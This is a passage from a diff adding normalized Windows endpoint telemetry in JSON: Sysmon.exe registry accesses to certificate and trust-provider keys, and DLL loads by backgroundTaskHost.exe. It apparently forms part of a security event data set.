"registry_value": "Certificates", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "slc.dll", + "image_path": "C:\\Windows\\System32\\slc.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571690740000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691210000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { 
+ "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "ncrypt.dll", + "image_path": "C:\\Windows\\System32\\ncrypt.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + 
"unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "ntasn1.dll", + "image_path": "C:\\Windows\\System32\\ntasn1.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691360000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common", + "registry_path": 
"\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskExecutionCountSinceLastReset", + "registry_value": "TaskExecutionCountSinceLastReset", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cdp.dll", + "image_path": "C:\\Windows\\System32\\cdp.dll", + "pid": 6376, + "process_name": 
"backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691050000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691520000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691520000, + "unique_pid": 